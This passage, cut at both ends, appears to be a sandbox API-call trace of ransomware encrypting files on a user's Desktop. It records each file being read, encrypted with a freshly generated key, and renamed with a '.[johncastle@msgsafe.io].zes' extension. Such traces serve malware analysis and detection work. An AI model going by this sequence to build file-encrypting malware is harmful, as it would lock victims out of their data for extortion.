nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x23ffc90, lpOverlapped=0x0 | out: lpBuffer=0x544a18*, lpNumberOfBytesWritten=0x23ffc90*=0x80, lpOverlapped=0x0) returned 1 [0134.011] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x23ffcb8 | out: lpNewFilePointer=0x0) returned 1 [0134.011] WriteFile (in: hFile=0x124, lpBuffer=0x23ffca8*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x23ffc90, lpOverlapped=0x0 | out: lpBuffer=0x23ffca8*, lpNumberOfBytesWritten=0x23ffc90*=0x8, lpOverlapped=0x0) returned 1 [0134.011] CryptImportKey (in: hProv=0x534c10, pbData=0x544958, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x23ffc94 | out: phKey=0x23ffc94*=0x53a568) returned 1 [0134.011] CryptSetKeyParam (hKey=0x53a568, dwParam=0x1, pbData=0x544b60, dwFlags=0x0) returned 1 [0134.011] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0134.011] ReadFile (in: hFile=0x124, lpBuffer=0x2140020, nNumberOfBytesToRead=0x11fe8, lpNumberOfBytesRead=0x23ffc9c, lpOverlapped=0x0 | out: lpBuffer=0x2140020*, lpNumberOfBytesRead=0x23ffc9c*=0x11fe8, lpOverlapped=0x0) returned 1 [0134.012] CryptEncrypt (in: hKey=0x53a568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2140020*, pdwDataLen=0x23ffc78*=0x11ff0, dwBufLen=0x11ff0 | out: pbData=0x2140020*, pdwDataLen=0x23ffc78*=0x11ff0) returned 1 [0134.013] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0134.013] WriteFile (in: hFile=0x124, lpBuffer=0x2140020*, nNumberOfBytesToWrite=0x11ff0, lpNumberOfBytesWritten=0x23ffc90, lpOverlapped=0x0 | out: lpBuffer=0x2140020*, lpNumberOfBytesWritten=0x23ffc90*=0x11ff0, lpOverlapped=0x0) returned 1 [0134.013] CryptDestroyKey (hKey=0x53a568) returned 1 [0134.013] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x120b4, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0134.013] SetEndOfFile (hFile=0x124) returned 1 [0134.018] GetProcessHeap () returned 0x520000 [0134.018] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x53a5f8 | out: hHeap=0x520000) returned 1 [0134.018] GetProcessHeap () returned 0x520000 [0134.018] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x544b60 | out: hHeap=0x520000) returned 1 [0134.018] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\bsikVZ.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\bsikvz.jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\bsikVZ.jpg.[4B2E4630].[johncastle@msgsafe.io].zes" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\bsikvz.jpg.[4b2e4630].[johncastle@msgsafe.io].zes")) returned 1 [0134.026] CloseHandle (hObject=0x124) returned 1 [0134.026] WaitForSingleObject (hHandle=0x118, dwMilliseconds=0x0) returned 0x102 [0134.026] FindNextFileW (in: hFindFile=0x544b08, lpFindFileData=0x23ffd20 | out: lpFindFileData=0x23ffd20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5d8c9350, ftCreationTime.dwHighDateTime=0x1d5dd00, ftLastAccessTime.dwLowDateTime=0x96f9f2e0, ftLastAccessTime.dwHighDateTime=0x1d5e5fc, ftLastWriteTime.dwLowDateTime=0x96f9f2e0, ftLastWriteTime.dwHighDateTime=0x1d5e5fc, nFileSizeHigh=0x0, nFileSizeLow=0x5995, dwReserved0=0x0, dwReserved1=0xffff, cFileName="BU7M mcTpJ93bZk.bmp", cAlternateFileName="BU7MMC~1.BMP")) returned 1 [0134.026] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\BU7M mcTpJ93bZk.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\bu7m mctpj93bzk.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0134.026] GetProcessHeap () returned 0x520000 [0134.026] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x10) returned 0x544b60 [0134.026] CryptGenRandom (in: hProv=0x534c10, dwLen=0x10, pbBuffer=0x544b60 | out: pbBuffer=0x544b60) returned 1 [0134.027] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x23ffcb0 | out: lpNewFilePointer=0x0) returned 1 [0134.027] WriteFile (in: hFile=0x124, lpBuffer=0x23ffcc0*, nNumberOfBytesToWrite=0xb, lpNumberOfBytesWritten=0x23ffc90, lpOverlapped=0x0 | out: lpBuffer=0x23ffcc0*, lpNumberOfBytesWritten=0x23ffc90*=0xb, lpOverlapped=0x0) returned 1 [0134.028] CryptImportKey (in: hProv=0x534c10, pbData=0x544890, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x23ffc94 | out: phKey=0x23ffc94*=0x53a5f8) returned 1 [0134.028] CryptSetKeyParam (hKey=0x53a5f8, dwParam=0x1, pbData=0x544b60, dwFlags=0x0) returned 1 [0134.028] GetProcessHeap () returned 0x520000 [0134.028] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x50) returned 0x544aa0 [0134.028] CryptEncrypt (in: hKey=0x53a5f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x544aa0*, pdwDataLen=0x23ffc78*=0x50, dwBufLen=0x50 | out: pbData=0x544aa0*, pdwDataLen=0x23ffc78*=0x50) returned 1 [0134.028] CryptDestroyKey (hKey=0x53a5f8) returned 1 [0134.028] WriteFile (in: hFile=0x124, lpBuffer=0x544aa0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x23ffc90, lpOverlapped=0x0 | out: lpBuffer=0x544aa0*, lpNumberOfBytesWritten=0x23ffc90*=0x50, lpOverlapped=0x0) returned 1 [0134.028] WriteFile (in: hFile=0x124, lpBuffer=0x23ffc98*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x23ffc90, lpOverlapped=0x0 | out: lpBuffer=0x23ffc98*, lpNumberOfBytesWritten=0x23ffc90*=0x4, lpOverlapped=0x0) returned 1 [0134.028] WriteFile (in: hFile=0x124, lpBuffer=0x544b60*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x23ffc90, lpOverlapped=0x0 | out: lpBuffer=0x544b60*, lpNumberOfBytesWritten=0x23ffc90*=0x10, lpOverlapped=0x0) returned 1 [0134.028] WriteFile (in: hFile=0x124, lpBuffer=0x544990*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x23ffc90, lpOverlapped=0x0 | out: lpBuffer=0x544990*, lpNumberOfBytesWritten=0x23ffc90*=0x80, lpOverlapped=0x0) returned 1 [0134.028] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x23ffcb8 | out: lpNewFilePointer=0x0) returned 1 [0134.029] WriteFile (in: hFile=0x124, lpBuffer=0x23ffca8*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x23ffc90, lpOverlapped=0x0 | out: lpBuffer=0x23ffca8*, lpNumberOfBytesWritten=0x23ffc90*=0x8, lpOverlapped=0x0) returned 1 [0134.029] CryptImportKey (in: hProv=0x534c10, pbData=0x544890, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x23ffc94 | out: phKey=0x23ffc94*=0x53a5f8) returned 1 [0134.029] CryptSetKeyParam (hKey=0x53a5f8, dwParam=0x1, pbData=0x544b60, dwFlags=0x0) returned 1 [0134.029] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0134.029] ReadFile (in: hFile=0x124, lpBuffer=0x2140020, nNumberOfBytesToRead=0x5995, lpNumberOfBytesRead=0x23ffc9c, lpOverlapped=0x0 | out: lpBuffer=0x2140020*, lpNumberOfBytesRead=0x23ffc9c*=0x5995, lpOverlapped=0x0) returned 1 [0134.029] CryptEncrypt (in: hKey=0x53a5f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2140020*, pdwDataLen=0x23ffc78*=0x59a0, dwBufLen=0x59a0 | out: pbData=0x2140020*, pdwDataLen=0x23ffc78*=0x59a0) returned 1 [0134.029] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0134.030] WriteFile (in: hFile=0x124, lpBuffer=0x2140020*, nNumberOfBytesToWrite=0x59a0, lpNumberOfBytesWritten=0x23ffc90, lpOverlapped=0x0 | out: lpBuffer=0x2140020*, lpNumberOfBytesWritten=0x23ffc90*=0x59a0, lpOverlapped=0x0) returned 1 [0134.030] CryptDestroyKey (hKey=0x53a5f8) returned 1 [0134.030] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x5a84, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0134.030] SetEndOfFile (hFile=0x124) returned 1 [0134.033] GetProcessHeap () returned 0x520000 [0134.033] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x544aa0 | out: hHeap=0x520000) returned 1 [0134.033] GetProcessHeap () returned 0x520000 [0134.033] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x544b60 | out: hHeap=0x520000) returned 1 [0134.033] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\BU7M mcTpJ93bZk.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\bu7m mctpj93bzk.bmp"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\BU7M mcTpJ93bZk.bmp.[4B2E4630].[johncastle@msgsafe.io].zes" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\bu7m mctpj93bzk.bmp.[4b2e4630].[johncastle@msgsafe.io].zes")) returned 1 [0134.037] CloseHandle (hObject=0x124) returned 1 [0134.037] WaitForSingleObject (hHandle=0x118, dwMilliseconds=0x0) returned 0x102 [0134.037] FindNextFileW (in: hFindFile=0x544b08, lpFindFileData=0x23ffd20 | out: lpFindFileData=0x23ffd20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd7c66490, ftCreationTime.dwHighDateTime=0x1d5e79e, ftLastAccessTime.dwLowDateTime=0x4fe162a0, ftLastAccessTime.dwHighDateTime=0x1d5e2d5, ftLastWriteTime.dwLowDateTime=0x4fe162a0, ftLastWriteTime.dwHighDateTime=0x1d5e2d5, nFileSizeHigh=0x0, nFileSizeLow=0x4409, dwReserved0=0x0, dwReserved1=0xffff, cFileName="bXlb_7naN_pfr0BxScfj.mp4", cAlternateFileName="BXLB_7~1.MP4")) returned 1 [0134.038] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\bXlb_7naN_pfr0BxScfj.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\bxlb_7nan_pfr0bxscfj.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0134.038] GetProcessHeap () returned 0x520000 [0134.038] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x10) returned 0x544b60 [0134.038] CryptGenRandom (in: hProv=0x534c10, dwLen=0x10, pbBuffer=0x544b60 | out: pbBuffer=0x544b60) returned 1 [0134.038] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x23ffcb0 | out: lpNewFilePointer=0x0) returned 1 [0134.038] WriteFile (in: hFile=0x124, lpBuffer=0x23ffcc0*, nNumberOfBytesToWrite=0x7, lpNumberOfBytesWritten=0x23ffc90, lpOverlapped=0x0 | out: lpBuffer=0x23ffcc0*, lpNumberOfBytesWritten=0x23ffc90*=0x7, lpOverlapped=0x0) returned 1 [0134.039] CryptImportKey (in: hProv=0x534c10, pbData=0x544958, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x23ffc94 | out: phKey=0x23ffc94*=0x53a5f8) returned 1 [0134.039] CryptSetKeyParam (hKey=0x53a5f8, dwParam=0x1, pbData=0x544b60, dwFlags=0x0) returned 1 [0134.039] GetProcessHeap () returned 0x520000 [0134.039] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x50) returned 0x544aa0 [0134.039] CryptEncrypt (in: hKey=0x53a5f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x544aa0*, pdwDataLen=0x23ffc78*=0x50, dwBufLen=0x50 | out: pbData=0x544aa0*, pdwDataLen=0x23ffc78*=0x50) returned 1 [0134.039] CryptDestroyKey (hKey=0x53a5f8) returned 1 [0134.039] WriteFile (in: hFile=0x124, lpBuffer=0x544aa0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x23ffc90, lpOverlapped=0x0 | out: lpBuffer=0x544aa0*, lpNumberOfBytesWritten=0x23ffc90*=0x50, lpOverlapped=0x0) returned 1 [0134.039] WriteFile (in: hFile=0x124, lpBuffer=0x23ffc98*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x23ffc90, lpOverlapped=0x0 | out: lpBuffer=0x23ffc98*, lpNumberOfBytesWritten=0x23ffc90*=0x4, lpOverlapped=0x0) returned 1 [0134.040] WriteFile (in: hFile=0x124, lpBuffer=0x544b60*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x23ffc90, lpOverlapped=0x0 | out: lpBuffer=0x544b60*, lpNumberOfBytesWritten=0x23ffc90*=0x10, lpOverlapped=0x0) returned 1 [0134.040] WriteFile (in: hFile=0x124, lpBuffer=0x544a18*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x23ffc90, lpOverlapped=0x0 | out: lpBuffer=0x544a18*, lpNumberOfBytesWritten=0x23ffc90*=0x80, lpOverlapped=0x0) returned 1 [0134.040] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x23ffcb8 | out: lpNewFilePointer=0x0) returned 1 [0134.040] WriteFile (in: hFile=0x124, lpBuffer=0x23ffca8*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x23ffc90, lpOverlapped=0x0 | out: lpBuffer=0x23ffca8*, lpNumberOfBytesWritten=0x23ffc90*=0x8, lpOverlapped=0x0) returned 1 [0134.040] CryptImportKey (in: hProv=0x534c10, pbData=0x544958, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x23ffc94 | out: phKey=0x23ffc94*=0x53a5f8) returned 1 [0134.040] CryptSetKeyParam (hKey=0x53a5f8, dwParam=0x1, pbData=0x544b60, dwFlags=0x0) returned 1 [0134.040] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0134.040] ReadFile (in: hFile=0x124, lpBuffer=0x2140020, nNumberOfBytesToRead=0x4409, lpNumberOfBytesRead=0x23ffc9c, lpOverlapped=0x0 | out: lpBuffer=0x2140020*, lpNumberOfBytesRead=0x23ffc9c*=0x4409, lpOverlapped=0x0) returned 1 [0134.040] CryptEncrypt (in: hKey=0x53a5f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2140020*, pdwDataLen=0x23ffc78*=0x4410, dwBufLen=0x4410 | out: pbData=0x2140020*, pdwDataLen=0x23ffc78*=0x4410) returned 1 [0134.041] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0134.041] WriteFile (in: hFile=0x124, lpBuffer=0x2140020*, nNumberOfBytesToWrite=0x4410, lpNumberOfBytesWritten=0x23ffc90, lpOverlapped=0x0 | out: lpBuffer=0x2140020*, lpNumberOfBytesWritten=0x23ffc90*=0x4410, lpOverlapped=0x0) returned 1 [0134.041] CryptDestroyKey (hKey=0x53a5f8) returned 1 [0134.041] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x44f4, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0134.041] SetEndOfFile (hFile=0x124) returned 1 [0134.044] GetProcessHeap () returned 0x520000 [0134.045] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x544aa0 | out: hHeap=0x520000) returned 1 [0134.045] GetProcessHeap () returned 0x520000 [0134.045] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x544b60 | out: hHeap=0x520000) returned 1 [0134.045] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\bXlb_7naN_pfr0BxScfj.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\bxlb_7nan_pfr0bxscfj.mp4"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\bXlb_7naN_pfr0BxScfj.mp4.[4B2E4630].[johncastle@msgsafe.io].zes" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\bxlb_7nan_pfr0bxscfj.mp4.[4b2e4630].[johncastle@msgsafe.io].zes")) returned 1 [0134.046] CloseHandle (hObject=0x124) returned 1 [0134.046] WaitForSingleObject (hHandle=0x118, dwMilliseconds=0x0) returned 0x102 [0134.046] FindNextFileW (in: hFindFile=0x544b08, lpFindFileData=0x23ffd20 | out: lpFindFileData=0x23ffd20*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0x0, dwReserved1=0xffff, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0134.046] FindNextFileW (in: hFindFile=0x544b08, lpFindFileData=0x23ffd20 | out: lpFindFileData=0x23ffd20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9b9d27e0, ftCreationTime.dwHighDateTime=0x1d5de77, ftLastAccessTime.dwLowDateTime=0x826bde00, ftLastAccessTime.dwHighDateTime=0x1d5dcbb, ftLastWriteTime.dwLowDateTime=0x826bde00, ftLastWriteTime.dwHighDateTime=0x1d5dcbb, nFileSizeHigh=0x0, nFileSizeLow=0xe32d, dwReserved0=0x0, dwReserved1=0xffff, cFileName="DqWuUGnY.avi", cAlternateFileName="")) returned 1 [0134.046] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\DqWuUGnY.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\dqwuugny.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0134.047] GetProcessHeap () returned 0x520000 [0134.047] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x10) returned 0x544b60 [0134.047] CryptGenRandom (in: hProv=0x534c10, dwLen=0x10, pbBuffer=0x544b60 | out: pbBuffer=0x544b60) returned 1 [0134.047] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x23ffcb0 | out: lpNewFilePointer=0x0) returned 1 [0134.047] WriteFile (in: hFile=0x124, lpBuffer=0x23ffcc0*, nNumberOfBytesToWrite=0x3, lpNumberOfBytesWritten=0x23ffc90, lpOverlapped=0x0 | out: lpBuffer=0x23ffcc0*, lpNumberOfBytesWritten=0x23ffc90*=0x3, lpOverlapped=0x0) returned 1 [0134.048] CryptImportKey (in: hProv=0x534c10, pbData=0x544890, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x23ffc94 | out: phKey=0x23ffc94*=0x53a5f8) returned 1 [0134.048] CryptSetKeyParam (hKey=0x53a5f8, dwParam=0x1, pbData=0x544b60, dwFlags=0x0) returned 1 [0134.048] GetProcessHeap () returned 0x520000 [0134.048] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x40) returned 0x535588 [0134.048] CryptEncrypt (in: hKey=0x53a5f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x535588*, pdwDataLen=0x23ffc78*=0x40, dwBufLen=0x40 | out: pbData=0x535588*, pdwDataLen=0x23ffc78*=0x40) returned 1 [0134.048] CryptDestroyKey (hKey=0x53a5f8) returned 1 [0134.048] WriteFile (in: hFile=0x124, lpBuffer=0x535588*, nNumberOfBytesToWrite=0x40, lpNumberOfBytesWritten=0x23ffc90, lpOverlapped=0x0 | out: lpBuffer=0x535588*, lpNumberOfBytesWritten=0x23ffc90*=0x40, lpOverlapped=0x0) returned 1 [0134.049] WriteFile (in: hFile=0x124, lpBuffer=0x23ffc98*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x23ffc90, lpOverlapped=0x0 | out: lpBuffer=0x23ffc98*, lpNumberOfBytesWritten=0x23ffc90*=0x4, lpOverlapped=0x0) returned 1 [0134.049] WriteFile (in: hFile=0x124, lpBuffer=0x544b60*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x23ffc90, lpOverlapped=0x0 | out: lpBuffer=0x544b60*, lpNumberOfBytesWritten=0x23ffc90*=0x10, lpOverlapped=0x0) returned 1 [0134.049] WriteFile (in: hFile=0x124, lpBuffer=0x544990*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x23ffc90, lpOverlapped=0x0 | out: lpBuffer=0x544990*, lpNumberOfBytesWritten=0x23ffc90*=0x80, lpOverlapped=0x0) returned 1 [0134.049] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x23ffcb8 | out: lpNewFilePointer=0x0) returned 1 [0134.049] WriteFile (in: hFile=0x124, lpBuffer=0x23ffca8*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x23ffc90, lpOverlapped=0x0 | out: lpBuffer=0x23ffca8*, lpNumberOfBytesWritten=0x23ffc90*=0x8, lpOverlapped=0x0) returned 1 [0134.049] CryptImportKey (in: hProv=0x534c10, pbData=0x544890, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x23ffc94 | out: phKey=0x23ffc94*=0x53a5f8) returned 1 [0134.049] CryptSetKeyParam (hKey=0x53a5f8, dwParam=0x1, pbData=0x544b60, dwFlags=0x0) returned 1 [0134.049] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0134.049] ReadFile (in: hFile=0x124, lpBuffer=0x2140020, nNumberOfBytesToRead=0xe32d, lpNumberOfBytesRead=0x23ffc9c, lpOverlapped=0x0 | out: lpBuffer=0x2140020*, lpNumberOfBytesRead=0x23ffc9c*=0xe32d, lpOverlapped=0x0) returned 1 [0134.050] CryptEncrypt (in: hKey=0x53a5f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2140020*, pdwDataLen=0x23ffc78*=0xe330, dwBufLen=0xe330 | out: pbData=0x2140020*, pdwDataLen=0x23ffc78*=0xe330) returned 1 [0134.050] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0134.051] WriteFile (in: hFile=0x124, lpBuffer=0x2140020*, nNumberOfBytesToWrite=0xe330, lpNumberOfBytesWritten=0x23ffc90, lpOverlapped=0x0 | out: lpBuffer=0x2140020*, lpNumberOfBytesWritten=0x23ffc90*=0xe330, lpOverlapped=0x0) returned 1 [0134.051] CryptDestroyKey (hKey=0x53a5f8) returned 1 [0134.051] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0xe404, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0134.051] SetEndOfFile (hFile=0x124) returned 1 [0134.055] GetProcessHeap () returned 0x520000 [0134.055] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x535588 | out: hHeap=0x520000) returned 1 [0134.055] GetProcessHeap () returned 0x520000 [0134.055] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x544b60 | out: hHeap=0x520000) returned 1 [0134.055] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\DqWuUGnY.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\dqwuugny.avi"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\DqWuUGnY.avi.[4B2E4630].[johncastle@msgsafe.io].zes" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\dqwuugny.avi.[4b2e4630].[johncastle@msgsafe.io].zes")) returned 1 [0134.080] CloseHandle (hObject=0x124) returned 1 [0134.081] WaitForSingleObject (hHandle=0x118, dwMilliseconds=0x0) returned 0x102 [0134.081] FindNextFileW (in: hFindFile=0x544b08, lpFindFileData=0x23ffd20 | out: lpFindFileData=0x23ffd20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf17c4400, ftCreationTime.dwHighDateTime=0x1d5df23, ftLastAccessTime.dwLowDateTime=0x700ba990, ftLastAccessTime.dwHighDateTime=0x1d5e2b8, ftLastWriteTime.dwLowDateTime=0x700ba990, ftLastWriteTime.dwHighDateTime=0x1d5e2b8, nFileSizeHigh=0x0, nFileSizeLow=0x8dbb, dwReserved0=0x0, dwReserved1=0xffff, cFileName="D_5K_QCaeZaqS1f_Oh_.avi", cAlternateFileName="D_5K_Q~1.AVI")) returned 1 [0134.081] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\D_5K_QCaeZaqS1f_Oh_.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\d_5k_qcaezaqs1f_oh_.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0134.081] GetProcessHeap () returned 0x520000 [0134.081] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x10) returned 0x544b60 [0134.081] CryptGenRandom (in: hProv=0x534c10, dwLen=0x10, pbBuffer=0x544b60 | out: pbBuffer=0x544b60) returned 1 [0134.081] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x23ffcb0 | out: lpNewFilePointer=0x0) returned 1 [0134.081] WriteFile (in: hFile=0x124, lpBuffer=0x23ffcc0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x23ffc90, lpOverlapped=0x0 | out: lpBuffer=0x23ffcc0*, lpNumberOfBytesWritten=0x23ffc90*=0x5, lpOverlapped=0x0) returned 1 [0134.082] CryptImportKey (in: hProv=0x534c10, pbData=0x544958, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x23ffc94 | out: phKey=0x23ffc94*=0x53a5f8) returned 1 [0134.082] CryptSetKeyParam (hKey=0x53a5f8, dwParam=0x1, pbData=0x544b60, dwFlags=0x0) returned 1 [0134.082] GetProcessHeap () returned 0x520000 [0134.083] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x50) returned 0x544aa0 [0134.083] CryptEncrypt (in: hKey=0x53a5f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x544aa0*, pdwDataLen=0x23ffc78*=0x50, dwBufLen=0x50 | out: pbData=0x544aa0*, pdwDataLen=0x23ffc78*=0x50) returned 1 [0134.083] CryptDestroyKey (hKey=0x53a5f8) returned 1 [0134.083] WriteFile (in: hFile=0x124, lpBuffer=0x544aa0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x23ffc90, lpOverlapped=0x0 | out: lpBuffer=0x544aa0*, lpNumberOfBytesWritten=0x23ffc90*=0x50, lpOverlapped=0x0) returned 1 [0134.083] WriteFile (in: hFile=0x124, lpBuffer=0x23ffc98*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x23ffc90, lpOverlapped=0x0 | out: lpBuffer=0x23ffc98*, lpNumberOfBytesWritten=0x23ffc90*=0x4, lpOverlapped=0x0) returned 1 [0134.083] WriteFile (in: hFile=0x124, lpBuffer=0x544b60*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x23ffc90, lpOverlapped=0x0 | out: 